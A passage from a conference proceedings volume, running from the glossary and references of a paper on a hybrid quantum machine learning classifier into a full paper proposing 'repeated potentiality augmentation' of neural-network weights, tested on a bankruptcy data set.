A. Leider et al.
Activation Function: An activation function is the function that determines if a neuron will output a signal based on the signals and weights of previous neurons, and if so by how much. Backpropagation: The algorithm by which a neural network decreases the distance between the output of the neural network and the optimal possible output of the same neural network. Backpropagation is an amalgam of the phrase “backward propagation”. Bloch Sphere: The Bloch Sphere is the three dimensional representation of the possible orientations a qubit can have with a radius of one as described in the review of the lectures of Felix Bloch in [2]. It is analogous to the unit circle. Circuit: A circuit is an ordered list of operations, gates, on a set of qubits to perform computational algorithms. CNOT Gate: The CNOT gate, CX gate, based on the value of a control qubit. ⎛ 1 0 0 ⎜ 0 1 0 ⎜ ⎝ 0 0 0 0 0 1
causes a rotation in a target qubit ⎞ 0 0 ⎟ ⎟ 1 ⎠ 0
CZ Gate: The CZ gate, controlled-Z gate, causes a rotation in a target qubit on the Z-axis based on the control qubit’s position on the Z-axis. ⎛ ⎞ 1 0 0 0 ⎜ 0 1 0 0 ⎟ ⎜ ⎟ ⎝ 0 0 1 0 ⎠ 0 0 0 −1 Dirac Notation: The Dirac notation as described first by [3] is the standard notation for quantum computing by which vectors are represented through the use of Bras| and |Kets to denote, respectively, column and row vectors. Epoch: Epoch is one iteration of training. Expectation Value: The expectation value is the probabilistic value of a circuit. Fold: The process of removing layers in a classical neural network. Gate: A gate is an operation performed on a qubit. Mathematically the gate is described as a matrix that changes the values of a qubit. This value change corresponds with a rotation in three dimensional space. The degree of the rotation can be a function of an input value. In this case, the gate was parameterized with that value (called a parameter). Learning Rate: A hyperparameter that determines the responsiveness of a model in the direction opposite the gradient. It is multiplied by the negative of the gradient to determine the change in a weight.
Hybrid Quantum Machine Learning Classifier with Transfer Learning
115
Neural Network: A neural network is a learning algorithm designed to resemble the neural connections in the human brain. Neuron: A neuron is the basic building block of a neural network. Connected neurons have weights to stimulate predetermined activation functions. Pooled Data Set: The data set after being propagated through a folded classical neural network, re-scaled and multiplied by Pi. Qubit: The qubit is the quantum computing analog of a classical bit represented as a vector of two numbers. The two numbers can be represented as a vector in three dimensional space. A qubit is represented as a wire in the graphical representation of a circuit. RX Gate: The RX gate causes a rotation of a qubit about the X-axis to a degree specified by a parameter. The angle of rotation is specified in radians and can be positive or negative. cos θ2 −i sin θ2 RX (θ) = −i sin θ2 cos θ2 Testing Set: The set of data used to verify the accuracy of the trained neural network. Training Set: The subset of data used to train the neural network. Unlearning Rate: Unlike the learning rate, the “unlearning rate” is not a hyperparameter because it is determined by a function. The value is deterministic. It determines the responsiveness of the circuits in the direction of the gradient. It is multiplied by the product of the learning rate and the positive gradient to determine the change in a weight. Weight: A weight can be thought of as the value denoting the strength of the connection between two neurons. It transforms the output signal of a neuron before it is fed into another neuron in the next layer.
References 1. Cappelletti, W., Erbanni, R., Keller, J.: Polyadic quantum classifier (2020). https://arxiv.org/pdf/2007.14044.pdf 2. Bloch, F., Walecka, J.D.: Fundamentals of statistical mechanics: manuscript and notes of Felix Bloch. World Scientific (2000) 3. Dirac, P.A.M.: A new notation for quantum mechanics. In: Mathematical Proceedings of the Cambridge Philosophical Society, vol. 35, pp. 416–418. Cambridge University Press (1939) 4. Jaoude, G.A.: Second Colab Notebook (2022). https://colab.research.google.com/ drive/1f5QkqpgSs1K5apArZjHyV gpZmGHfWDT?usp=sharing 5. Jaoude, G.A.: Google Colab Showing Code (2022). https://colab.research.google. com/drive/1s8B5rQh0dDb5yYgzmpgmWUf54YZ9PUju?usp=sharing
116
A. Leider et al.
6. Leider, A., Jaoude, G.A., Strobel, A.E., Mosley, P.: Quantum machine learning classifier. In: Arai, K. (ed.) FICC 2022. LNNS, vol. 438, pp. 459–476. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98012-2 34 7. Aflack, O.: neural network.ipynb (2018). https://colab.research.google.com/drive/ 10y6glU28-sa-OtkeL8BtAtRlOITGMnMw#scrollTo=oTrTMpTwtLXd 8. Open source quantum information kit. Qiskit (2022). https://qiskit.org/ 9. PennyLane dev team. Quantum gradients with backpropagation (2021). https:// pennylane.ai/qml/demos/tutorial variational classifier.html 10. Scikit-learn. Wine Dataset (2021). https://scikit-learn.org/stable/modules/ generated/sklearn.datasets.load wine.htmll
Repeated Potentiality Augmentation for Multi-layered Neural Networks Ryotaro Kamimura(B) Tokai University and Kumamoto Drone Technology and Development Foundation, 2880 Kamimatsuo Nishi-ku, Kumamoto 861-5289, Japan [email protected] Abstract. The present paper proposes a new method to augment the potentiality of components in neural networks. The basic hypothesis is that all components should have equal potentiality (equi-potentiality) to be used for learning. This equi-potentiality of components has implicitly played critical roles in improving multi-layered neural networks. We introduce here the total potentiality and relative potentiality for each hidden layer, and we try to force networks to increase the potentiality as much as possible to realize the equi-potentiality. In addition, the potentiality augmentation is repeated at any time the potentiality tends to decrease, which is used to increase the chance for any components to be used as equally as possible. We applied the method to the bankruptcy data set. By keeping the equi-potentiality of components by repeating the process of potentiality augmentation and reduction, we could see improved generalization. Then, by considering all possible representations by the repeated potentiality augmentation, we can interpret which inputs can contribute to the final performance of networks. Keywords: Equi-potentiality · Total potentiality · Relative potentiality · Collective interpretation · Partial interpretation
1 Introduction This section explains why the basic property of equi-potentiality should be introduced to improve generalization and interpretation. The equi-potentiality means that all components should be used as equally as possible in learning. In particular, we try to show how this basic property has been explicitly or implicitly used in several methods in neural networks by surveying the literature of many existing and important methods and hypotheses, such as competitive learning, mutual information, lottery ticket hypothesis, and interpretation methods. 1.1 Potentiality Reduction The present paper proposes a method of increasing the potentiality of components as much as possible. The potentiality means to what degree the corresponding components contribute to the inner activity of neural networks. At the initial stage of learning, c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 117–134, 2023. https://doi.org/10.1007/978-3-031-28073-3_9
118
R. Kamimura
the potentiality of components should be large, because the inner activity is not constrained by any outer conditions. In the course of learning, this initial potentiality tends to decrease, and the potentiality in neural networks is transformed into a form of information to be used actually in learning. For example, the potentiality of components should be decreased to reduce errors between outputs and targets in supervised learning. Thus, the potentiality for representing the inner activity tends to lose its strength implicitly and overtly in neural learning. One of the main problems is, therefore, how to increase the prior potentiality, because larger potentiality means more adaptability and flexibility in learning. In this context, this paper proposes a method of augmenting the potentiality to realize the equi-potentiality at any time. 1.2
Competitive Learning
The importance of equi-potentiality of components has been well recognized in the conventional competitive learning [1], self-organizing maps [2–8], and related informationtheoretic methods [9]. The competitive learning aims to discover distinctive features in input patterns by determining output neurons maximally responding to specific inputs. In this method, the output neurons naturally should have the basic and specific features to win the competition. In addition, it is supposed that all neurons should be equally responsible for representing inputs, namely, equi-potentiality in this paper. Though this equi-potentiality has been recognized from the beginning, this property has not necessarily been implemented with success. The problem of dead neurons without any potentiality has been one of the major problems in competitive learning [10–16]. Thus, though the importance of equi-potentiality has been considered significant, the method for equi-potentiality has not been well established until now. In addition, this equi-potentiality has been considered important in informationtheoretic methods, though little attention has been paid to this property due to the complexity of computation [9, 17–23]. For example, this equi-potentiality has been expressed in the form of mutual information in neural networks. In terms of potentiality, mutual information can be decomposed as the equi-potentiality of components and the specification of each component. Thus, this information-theoretic method deals not only with the acquisition of specific information but also with the equal use of all components, quite similar to the case with competitive learning. The importance of equal-potentiality has been recognized, but this property has not been fully considered due to the complexity of computing mutual information. 1.3
Regularization
The equi-potentiality should be related to the well-known regularization in neural networks [24–28], but the equi-potentiality has not received due attention in the explicit and implicit regularization. For example, to improve generalization, the weight decay and its related methods have been introduced to restrict the potentiality of weights. These may have no problems in learning when we suppose that neural networks can choose appropriate solutions immediately among many. However, if not, the regularization methods have difficulty in seeking for some others in the course of learning. This paper tries to show that we need to introduce the equi-potentiality of weights to find appropriate ones among many possibilities. Though the random noises or similar
Repeated Potentiality Augmentation
119
effects in the conventional learning are expected to be effective in this restoration, those methods are insufficient to find appropriate solutions in learning. This paper shows that, for the regularization to be effective, the concept of equi-potentiality should play more active roles in increasing the possibility of finding final and appropriate weights. Related to the regularization discussed above and the equi-potentiality, a new hypothesis for learning has recently received due attention, namely, the lottery ticket hypothesis [29–36], where learning is considered not as a process of creating appropriate models but as a process of finding or mining them from already existing ones. Behind a process of finding appropriate models from many in the case of huge multi-layered neural networks, there should, though implicitly, be a principle of equal-potentiality of any components or sub-networks. As mentioned above, learning is a process of reducing the potentiality in a neural network. By the effect of implicit and explicit regularization, error reduction between outputs and targets can only be realized by reducing the potentiality of some components. Thus, the lottery ticket hypothesis can be realized only based on the equipotentiality of all components or sub-networks. More strongly, we should say that the lottery ticket hypothesis cannot be valid unless the property of equi-potentiality of components or sub-networks is supposed. Thus, the lottery ticket hypothesis may be sound in principle. However, in actual learning, we need to develop a method to realize actively the equi-potentiality of all components and sub-networks. 1.4 Comprehensive Interpretation Finally, because the present paper tries to interpret the final internal representations in neural networks, we should mention the relation of equi-potentiality to the interpretation. As has been well known, the interpretation of final internal representations created by neural networks has been one of the main problems in theoretical as well as practical studies [37–42]. Unless we understand the main mechanism of neural networks, the improvement of learning methods becomes difficult, and without explaining the inference mechanism of neural networks, it is almost impossible for the neural networks to be used for specific and practical applications. One of the main problems in interpreting neural networks lies in the naturally distributed characteristics of inference processing. The actual inference is supposed to be performed collaborating with a number of different components inside and input patterns and initial conditions outside. In spite of this fact of distributed property, the main interpretation methods so far developed, especially in the convolutional neural networks, have focused on a specific instance of inference mechanism, and it can be called “local interpretation” [43–57] to cite a few. At this point, we should introduce in the field of interpretation, the equi-potentiality. This means that, though it may be useful to have a specific interpretation for a specific example of the interpretation problem, we need to consider all possible representations for the problem. More strongly, we should suppose that all possible representations should have equal potentiality for appropriate interpretation. Returning to the above discussion on the equi-potentiality of components, we need to consider all possible representations and any different configurations of components as equally as possible. Once again, we should stress that the majority of interpretation methods seem to be confined within a specific instance of possible interpretations. We need to develop a method to consider as many instances as possible for comprehensive interpretation.
120
R. Kamimura
In this paper, we interpret the inference mechanism, supposing that all instances have the same status or importance and all representations have the equal potentiality for interpretation. Thus, the interpretation can be as comprehensive as possible. 1.5
Paper Organization
In Sect. 2, we try to explain the concepts of potentiality and how to define two types of potentiality: total and relative potentiality. After briefly explaining how to train neural networks with the potentiality, we introduce the collective interpretation in which all possible instances of interpretation have the same importance. In particular, we show how a single hidden neuron tries to detect features by this interpretation method. Finally, we apply the method to the bankruptcy data set. We try to show how the final representations can be changed by repeating and augmenting the potentiality of connection weights in hidden layers. The final results show that, for improving generalization, it is necessary to control the total potentiality and to increase the relative potentiality. By examining the whole sets of final representations, we can see which inputs are important in inferring the bankruptcy of companies.
2 Theory and Computational Methods 2.1
Repeated Potentiality Reduction and Augmentation
In this paper, it is supposed that total potentiality of components such as connection weights, neurons, and layers tends to decrease. The learning is considered a process to reduce the initial potentiality for some specific objectives of learning. This reduction in potentiality can restrict the flexibility of learning, necessary in obtaining appropriate information for any components. Thus, we need to restore the potentiality to increase the possibility to obtain appropriate components. As shown in Fig. 1, we suppose that a network has maximum potentiality only when each connection weight is connected equally with all neurons. The maximum potentiality means that all neurons have the same potentiality to be connected with the other neurons. In a process of learning, error minimization between outputs and targets is forced for some connection weights to become stronger, which is necessary in reducing errors between outputs and targets. If these connection weights are not well suited for error minimization, we need to move to other connection weights. This paper supposes that we need to restore the initial potentiality as much as possible for neurons to have an equal chance of being chosen at any time of learning in Fig. 1(b). In a process of learning, we should repeat this process of reduction and augmentation as many times as possible for obtaining the final appropriate connection weights, shown in Fig. 1(d) and (e). 2.2
Total and Relative Information
In this paper, the potentiality in a hidden layer can be represented by the sum of all individual potentialities. The individual potentiality can be defined as the first approximation by the absolute weights. For simplicity, we consider weights from the second to the third layer, represented by (2, 3), and the individual potentiality is defined by
Repeated Potentiality Augmentation
121
Fig. 1. Repeated potentiality reduction and augmentation. (2,3)
ujk
(2,3)
=| wjk
|
(1)
Then, total information is the sum of all individual potentialities in the layer. T (2,3) =
n2 n3 j=1 k=1
(2,3)
ujk
(2)
where n2 and n3 denote the number of neurons in each layer. As mentioned above, learning is considered as the reduction of this potentiality. One possible way for the reduction is to reduce the number of strong weights. Then, we should count the number of strong weights in a layer. The relative potentiality is introduced to represent the number of strong weights in a layer. The relative potentiality is the potentiality relative to the corresponding maximum potentiality. (2,3) rjk
(2,3)
=
ujk
(2,3)
maxj k uj k
(3)
122
R. Kamimura
where the max operation is over all connection weights between the layers. In addition, we define the complementary one by (2,3)
r¯jk
(2,3)
=1−
ujk
(2,3)
maxj k uj k
(4)
We simply call this absolute strength “potentiality” and “complementary potentiality”. By using this potentiality, relative potentiality can be computed by (2,3) n2 n3 ujk (2,3) R (5) = (2,3) j=1 k=1 maxj k uj k When all potentialities become equal, naturally, the relative potentiality becomes maximum. On the other hand, when only one potentiality becomes one while all the others are zero, the relative potentiality becomes minimum. For simplicity, we suppose that at least one connection weight should be larger than zero. 2.3
Repeated Learning
Learning is composed of two phases. In the first phase, we try to increase total potentiality and at the same time increase the relative potentiality. For the (n + 1)th learning step, weights are computed by (2,3)
(2,3)
(2,3)
wjk (n + 1) = θ r¯jk (n) wjk (n)
(6)
where the parameter θ should be larger than one, which has an effect of increasing total potentiality. In addition, the complement potentiality r¯ is used to decrease weight strength in direct proportion to the strength of the weights. This means that larger weights become smaller, and eventually all weights became smaller and equally distributed. In the second phase, the parameter θ is less than one, reducing the strength of weights. In addition, the individual potentiality is used to reduce the strength of weights, except for one specific weight. (2,3)
(2,3)
(2,3)
wjk (n + 1) = θ rjk (n) wjk (n)
(7)
As shown in Fig. 1, this process of reduction and augmentation is repeated several times in learning. 2.4
Full and Partial Compression
The interpretation in this paper tries to be as comprehensive as possible. For realizing this, we suppose that all components and all intermediate states have the same status and importance for interpretation. This is the equi-potentiality principle of interpretation, as mentioned above.
Repeated Potentiality Augmentation
123
First, for interpreting multi-layered neural networks, we compress them into the simplest ones, as shown in Fig. 2(a). We try here to trace all routes from inputs to the corresponding outputs by multiplying and summing all corresponding connection weights. First, we compress connection weights from the first to the second layer, denoted by (1, 2), and from the second to the third layer (2, 3) for an initial condition and a subset of a data set.
Fig. 2. Network compression from the initial state to the simplest and compressed network, and final collective weights by full compression (a) and partial compression (b).
Then, we have the compressed weights between the first and the third layer, denoted by (1, 3). n2 (1,3) (1,2) (2,3) wij wjk (8) wik = j=1
Those compressed weights are further combined with weights from the third to the fourth layer (3, 4), and we have the compressed weights between the first and the fourth layer (1, 4).
124
R. Kamimura (1,4)
wil
=
n3 k=1
(1,3)
wik
(3,4)
wkl
(9)
By repeating these processes, we have the compressed weights between the first (1,5) and fifth layer, denoted by wiq . Using those connection weights, we have the final and fully compressed weights (1, 6). (1,6)
wir
=
n5 q=1
(1,5)
wiq
(5,6) wqr
(10)
For the full compression, we compress all hidden layers as explained above. For the effect of a specific hidden layer, we compress a network only with one specific hidden layer, which can be called “partial” compression. By using this partial compression, we can examine what kind of features a hidden layer tries to deal with. In Fig. 2(b), we focus on the weights from the third to the fourth layer. We first combine the input and the hidden layer. n3 (1,(3,4)) (1,2) (3,4) = wik wkl (11) wik k=1
where the notation (1,(3,4)) means that only weights from the third to the fourth layer are considered. Then, these compressed weights are combined immediately with the output layer n5 (1,(3,4),6) (1,(3,4)) (5,6) = wiq wqr (12) wir q=1
In this way, we can consider only the effect by a single hidden layer. In this paper, the number of neurons in all hidden layers is supposed to be the same, but this method can be applied to the case where the number of neurons is different for each hidden layer.
3 Results and Discussion 3.1
Experimental Outline
The experiment aimed to infer the possibility of bankruptcy of companies, based on six input variables [58]. In social sciences, due to the inability and instability of interpretation, neural networks have been reluctantly used in their analytical processes. However, the final results by the conventional statistical methods have limited the scope of interpretation, ironically due to the stability and reliability of the methods. On the contrary, neural networks are more instable models, compared with the conventional statistical models. However, the instability is related to the flexibility of interpretation. Neural networks are naturally dependent much on the inputs and initial conditions, as well as any other conditions. This seems to be a fatal shortcoming of neural networks, but neural networks have much potentiality to see an input from a number of different viewpoints. The only problem is that neural networks have so far tried to limit this potentiality as much as possible by using methods such as regularization. The present paper tries to
Repeated Potentiality Augmentation
125
consider all these viewpoints by neural networks as much as possible for the comprehensive interpretation. Thus, this experiment on bankruptcy may be simple but a good benchmark to show the flexibility and potentiality of our method of considering as many conditions as possible for the practical problem. The data set contained 130 companies, and we tried to classify whether or not the corresponding companies were in a state of bankruptcy. We used the very redundant ten-layered neural networks with ten hidden layers. The potentiality of hidden layers was controlled by our potentiality method, while the input and output layer remained untouched by the new method, because we had difficulty in controlling the input and output layer by the present method. For easily reproducing the final results in this paper, we used the neural network package in the scikit-learn software package, where almost all parameters remained as the default ones except for the activation function (changed to the tangent hyperbolic) and the number of learning epochs (determined by the potentiality method). 3.2 Potentiality Computation The results show that when the parameter θ increased gradually, total potentiality became larger, while oscillating greatly. The relative potentiality tended to be close to its maximum value by this effect. However, too-large parameter values caused extremely large potentiality. In the first place, we try to show the final results of total potentiality and relative potentiality by the conventional methods and the new methods. Figure 3 shows total potentiality (left) and relative potentiality (right). By the conventional method in Fig. 3(a), total potentiality (left) and relative potentiality (right) remained almost constant, independently of learning steps. When the parameter θ was 1.0 in Fig. 3(b), total potentiality (left) were small and tended to decrease when the number of learning steps increased. On the other hand, the relative potentiality (right) increased gradually as a function of the number of learning steps. However, the total potentiality could not come close to the maximum values. When the parameter θ increased to 1.1 in Fig. 3(c), the total potentiality was slightly larger, and the oscillation of relative potentiality became clear, meaning that the relative potentiality tried to increase with an up-and-down movement. When the parameter θ increased to 1.2 in Fig. 3(d), the oscillation could be clearly seen both in the total potentiality and relative potentiality. When the parameter θ increased to 1.3 with the best generalization in Table 1, the oscillation of total potentiality became the largest, and the total potentiality tended to increase. In addition, the relative potentiality, while oscillating, became close to the maximum value. When the parameter θ increased further to 1.4 (f) and 1.5 (g), the total potentiality tended to have extreme values, and the relative potentiality became close to the maximum values without oscillation. 3.3 Collective Weights The results show that, when the parameter θ was relatively small, collective weights and the ratio of the collective weights to the original correlation coefficients were similar to those by the conventional method. When the parameter θ was further increased to 1.3,
126
R. Kamimura
Fig. 3. Total potentiality (Left) and relative potentiality (Right) as a function of the number of steps by the conventional method (a), and by the new methods when the parameter θ increased from 1.0 (b) to 1.5 (g) for the bankruptcy data set. A boxed figure represents a state with maximum generalization.
the collective weights and the ratio became completely different from the original correlation coefficients and the ratio by the conventional method. This means that the neural networks tended to obtain weights close to the original correlation coefficients, but when generalization performance was forced to increase, completely different weights could be obtained. Figure 4(a) shows the collective weights (left) and ratio (middle) of absolute collective weights to the absolute correlation coefficients, and the original correlation coefficients between inputs and target (right) by using the conventional method. As can be seen in the left-hand figure, input No. 2 (capital adequacy ratio) and especially
Repeated Potentiality Augmentation
127
No. 5 (sales C/F to current liabilities) were strongly negative. The ratio of the collective weights to the correlation coefficients (middle) shows that the strength increased gradually when the input number increased from 1 to 5. This means that input No. 5 played an important role linearly and non-linearly. When the parameter θ was 1.0 in Fig. 4(b), almost the same tendencies could be seen in all measures except the ratio (middle). The ratio was different from that by the conventional method, where input No. 6 (sales per person) had larger strength. When the parameter θ increased to 1.1, this tendency was clearer, and input No. 6 had the largest strength. When the parameter θ was 1.2 in Fig. 4(d), the collective weights (left) were different from the correlation coefficients, but the ratio still tended to have the same characteristics. When the parameter θ increased to 1.3 with the best generalization in Fig. 4(e), the collective weights were completely different from the original correlation coefficients, and input No. 3 (sales growth rates) took the highest strength. When the parameter θ increased to 1.4 in Fig. 4(f) and 1.5 in Fig. 4(g), all measures again became similar to those by the conventional method, though in the ratio (middle), some differences could be detected. The results show that neural networks tended to produce collective weights close to the original correlation coefficients. However, when the generalization was forced to increase by increasing the parameter, the collective weights became different from the correlation coefficients. Thus, neural networks could extract weights close to the correlation coefficients, and in addition, the networks could produce weights different from the correlation coefficients, which tried to extract, roughly speaking, non-linear relations between inputs and outputs. 3.4 Partially Collective Weights The partially collective weights show that the conventional method tended to use the hidden layers close to the input and output. On the contrary, the new methods tried to focus on the hidden layer close to the input or output layer. However, to obtain the best generalization performance, all hidden layers should be somehow used. Figure 5 shows the collective weights computed by a single hidden layer. In the figure, from left to right and top to bottom, the collective weights were plotted by computing collective weights only with a single hidden layer. As shown in Fig. 5(a) by the conventional method, one of the most important characteristics is that the collective weights computed with the hidden layer close to the input (above left) and output layer (right bottom) were relative larger, meaning that the hidden layers close to the input and output layer, tended to have much information content. On the contrary, when the parameter θ was 1.0 in Fig. 5(b), the collective weights with the hidden layer close to the output layer had only larger strength. When the parameter θ increased to 1.5 in Fig. 5(d), the collective weights only with the hidden layer, close to the input layer, had larger strength. However, when the parameter θ increased to 1.3 with the best generalization performance in Fig. 5(c), the collective weights for almost all hidden layers tended to have a somewhat large strength, meaning that to improve generalization performance, it is necessary to somehow use all possible hidden layers.
128
R. Kamimura
Fig. 4. The collective weights (Left), the ratio (Middle) of absolute collective weights to absolute correlation coefficients, and the original correlation coefficients (Right) by the conventional method (a) and when the parameter θ increased from 1.0 (b) to 1.5 (g) for the bankruptcy data set.
Repeated Potentiality Augmentation
129
Fig. 5. Partially collective weights with only a single hidden layer for the bankruptcy data set.
130
R. Kamimura
Table 1. Summary of experimental results on average correlation coefficients and generalization performance for the bankruptcy data set. The numbers in the method represent the values of the parameter θ to control the potentialities. Letters in bold type indicate the maximum values. Method
Correlation Accuracy
1.0 1.1 1.2 1.3 1.4 1.5
0.882 0.863 −0.510 0.362 0.788 0.879
0.882 0.879 0.900 0.908 0.897 0.862
Conventional
0.811
0.877
Logistic
0.979
Random forest −0.905
3.5
0.813 0.779
Correlation and Generalization
The new method could produce the best generalization by using the weights far from the original correlation coefficients, while the conventional logistic regression naturally produced coefficients very close to the original correlation coefficients. Table 1 shows the summary of results on correlation and generalization. The generalization accuracy increased from 0.882 (θ = 1.0) to the largest one of 0.908 (θ = 1.3). The correlation coefficient between collective weights and the original correlation coefficient of the data set decreased from 0.882 (θ = 1.0) to 0.362 (θ = 1.3), and again, the correlation increased. When the generalization performance was the largest and the parameter θ was 1.3, the strength of the correlation became the smallest. This means that, to improve generalization performance, we need to use some non-linear relations in a broad sense. The logistic regression analysis produced an almost perfect correlation of 0.979, but the generalization was the second worst at 0.813, behind the random forest. The random forest produced a high negative correlation, because the importance could not take into account the negativity of inputs. Neural networks could improve generalization performance even if the weights represent linear relations between inputs and outputs. However, when the networks are forced to increase generalization, they try to use non-linear relations different from the correlation coefficients.
4 Conclusion The present paper showed the importance of equi-potentiality of components. The total potentiality can be defined in terms of the sum of absolute weights, and relative potentiality can be defined with respect to the maximum potentiality. We suppose that all components in neural networks should be used as equally as possible, at least in the course of learning, for the final representations to consider as many situations as possible. However, this equi-potentiality tends to decrease in the course of learning, because
Repeated Potentiality Augmentation
131
learning can be considered a process to transform the potentiality into the real information to be used in actual learning. Thus, we need to restore the potentiality of components as much as possible at any time. Every time the potentiality decreases, we need to re-increase the potentiality in learning for all components to have an equal chance to be chosen in learning. This consideration is applied not only to the learning processes but also to the interpretation. The same principle of equi-potentiality of representations can also be applied to interpretation. In the conventional interpretation methods, the specific and local interpretation is applied, even though we have a number different representations. In our interpretation method, all those representations have the same status and importance, and they should be taken into account for the interpretation to be as comprehensive as possible. The method was applied to the bankruptcy data set. By repeating and augmenting the potentiality, we could produce results with a different generalization and correlation. By examining all those instances, we could infer the basic inference mechanism in the bankruptcy. The results confirmed that the weights were quite close to the original correlation coefficients between outputs and targets when the potentiality was not sufficiently increased. Then, when the generalization was forced to increase by increasing the potentiality, collective weights far from the original correlation coefficients were obtained. This finding with better generalization can be due to the equal consideration of all representations created by neural networks. One of the main problems is how to combine different computational procedures such as total and relative potentiality reduction and augmentation. We need to examine how to control those computational procedures for improving generalization and interpretation. Though some problems in computation should be solved for practical application, the results on the equi-potentiality can contribute to understanding the main inference mechanism of neural networks.
References 1. Rumelhart, D.E., Zipser, D.: Feature discovery by competitive learning. Cogn. Sci. 9, 75–112 (1985) 2. Kohonen, T.: Self-Organizing Maps. Springer, Heidelberg (1995). https://doi.org/10.1007/ 978-3-642-97610-0 3. Himberg, J.: A SOM based cluster visualization and its application for false colouring. In: Proceedings of the International Joint Conference on Neural Networks, pp. 69–74 (2000) 4. Bogdan, M., Rosenstiel, W.: Detection of cluster in self-organizing maps for controlling a prostheses using nerve signals. In 9th European Symposium on Artificial Neural Networks. ESANN 2001. Proceedings. D-Facto, Evere, Belgium, pp. 131–136 (2001) 5. Yin, H.: Visom-a novel method for multivariate data projection and structure visualization. IEEE Trans. Neural Networks 13(1), 237–243 (2002) 6. Brugger, D., Bogdan, M., Rosenstiel, W.: Automatic cluster detection in Kohonen’s Som. IEEE Trans. Neural Networks 19(3), 442–459 (2008) 7. Xu, L., Xu, Y., Chow, T.W.S.: Polsom: a new method for multidimensional data visualization. Pattern Recogn. 43(4), 1668–1675 (2010) 8. Xu, L., Xu, Y., Chow, T.W.S.: PolSOM-a new method for multidimentional data visualization. Pattern Recogn. 43, 1668–1675 (2010) 9. Linsker, R.: Self-organization in a perceptual network. Computer 21(3), 105–117 (1988)
132
R. Kamimura
10. DeSieno, D.: Adding a conscience to competitive learning. In: IEEE international Conference on Neural Networks, vol. 1, pp. 117–124. Institute of Electrical and Electronics Engineers, New York (1988) 11. Fritzke, B.: Vector quantization with a growing and splitting elastic net. In: Gielen, S., Kappen, B. (eds.) ICANN 1993, pp. 580–585. Springer, London (1993). https://doi.org/10.1007/ 978-1-4471-2063-6 161 12. Fritzke, B.: Automatic construction of radial basis function networks with the growing neural gas model and its relevance for fuzzy logic. In: Applied Computing 1996: Proceedings of the 1996 ACM Symposium on Applied Computing, Philadelphia, pp. 624–627. ACM (1996) 13. Choy, C.S., Siu, W.: A class of competitive learning models which avoids neuron underutilization problem. IEEE Trans. Neural Networks 9(6), 1258–1269 (1998) 14. Van Hulle, M.M.: Faithful representations with topographic maps. Neural Netw. 12(6), 803– 823 (1999) 15. Banerjee, A., Ghosh, J.: Frequency-sensitive competitive learning for scalable balanced clustering on high-dimensional hyperspheres. IEEE Trans. Neural Networks 15(3), 702–719 (2004) 16. Van Hulle, M.M.: Entropy-based kernel modeling for topographic map formation. IEEE Trans. Neural Networks 15(4), 850–858 (2004) 17. Linsker, R.: Self-organization in a perceptual network. Computer 21, 105–117 (1988) 18. Linsker, R.: How to generate ordered maps by maximizing the mutual information between input and output signals. Neural Comput. 1(3), 402–411 (1989) 19. Linsker, R.: Local synaptic learning rules suffice to maximize mutual information in a linear network. Neural Comput. 4(5), 691–702 (1992) 20. Torkkola, K.: Feature extraction by non-parametric mutual information maximization. J. Mach. Learn. Res. 3, 1415–1438 (2003) 21. Leiva-Murillo, J.M., Art´es-Rodr´ıguez, A.: Maximization of mutual information for supervised linear feature extraction. IEEE Trans. Neural Networks 18(5), 1433–1441 (2007) 22. Van Hulle, M.M.: The formation of topographic maps that maximize the average mutual information of the output responses to noiseless input signals. Neural Comput. 9(3), 595– 606 (1997) 23. Principe, J.C.: Information Theoretic Learning: Renyi’s Entropy and Kernel Perspectives. Springer, New York (2010). https://doi.org/10.1007/978-1-4419-1570-2 24. Moody, J., Hanson, S., Krogh, A., Hertz, J.A.: A simple weight decay can improve generalization. Adv. Neural. Inf. Process. Syst. 4, 950–957 (1995) 25. Kukaˇcka, J., Golkov, V., Cremers, D.: Regularization for deep learning: a taxonomy. arXiv preprint arXiv:1710.10686 (2017) 26. Goodfellow, I., Bengio, Y., Courville, A.: Regularization for deep learning. Deep Learn. 216–261 (2016) 27. Wu, C., Gales, M.J.F., Ragni, A., Karanasou, P., Sim, K.C.: Improving interpretability and regularization in deep learning. IEEE/ACM Trans. Audio Speech Language Process. 26(2), 256–265 (2017) 28. Fan, F.-L., Xiong, J., Li, M., Wang, G.: On interpretability of artificial neural networks: a survey. IEEE Trans. Radiat. Plasma Med. Sci. 5, 741–760 (2021) 29. X. Ma, et al.: Sanity checks for lottery tickets: does your winning ticket really win the jackpot? In: Advances in Neural Information Processing Systems, vol. 34 (2021) 30. Bai, Y., Wang, H., Tao, Z., Li, K., Fu, Y.: Dual lottery ticket hypothesis. arXiv preprint arXiv:2203.04248 (2022) 31. da Cunha, A., Natale, E., Viennot, L.: Proving the strong lottery ticket hypothesis for convolutional neural networks. In: International Conference on Learning Representations (2022) 32. Chen, X., Cheng, Y., Wang, S., Gan, Z., Liu, J., Wang, Z.: The elastic lottery ticket hypothesis. In: Advances in Neural Information Processing Systems, vol. 34 (2021)
Repeated Potentiality Augmentation
133
33. Malach, E., Yehudai, G., Shalev-Schwartz, S., Shamir, O.: Proving the lottery ticket hypothesis: pruning is all you need. In: International Conference on Machine Learning, pp. 6682– 6691. PMLR (2020) 34. Frankle, J., Dziugaite, G.K., Roy, D., Carbin, M.: Linear mode connectivity and the lottery ticket hypothesis. In: International Conference on Machine Learning, pp. 3259–3269. PMLR (2020) 35. Frankle, J., Dziugaite, G.K., Roy, D.M., Carbin, M.: Stabilizing the lottery ticket hypothesis. arXiv preprint arXiv:1903.01611 (2019) 36. Frankle, J., Carbin, M.: The lottery ticket hypothesis: finding sparse, trainable neural networks. arXiv preprint arXiv:1803.03635 (2018) 37. Goodman, B., Flaxman, S.: European union regulations on algorithmic decision-making and a right to explanation. arXiv preprint arXiv:1606.08813 (2016) 38. Arrieta, A.B., et al.: Explainable artificial intelligence (XAI): concepts, taxonomies, opportunities and challenges toward responsible AI. Inf. Fusion 58, 82–115 (2020) 39. Rudin, C.: Stop explaining black box machine learning models for high stakes decisions and use interpretable models instead. Nat. Mach. Intell. 1(5), 206–215 (2019) 40. Rai, A.: Explainable AI: from black box to glass box. J. Acad. Mark. Sci. 48(1), 137–141 (2020) 41. Weidele, D.K.I., et al.: opening the blackbox of automated artificial intelligence with conditional parallel coordinates. In: Proceedings of the 25th International Conference on Intelligent User Interfaces, pp. 308–312 (2020) 42. Pintelas, E., Livieris, I.E., Pintelas, P.: A grey-box ensemble model exploiting black-box accuracy and white-box intrinsic interpretability. Algorithms 13(1), 17 (2020) 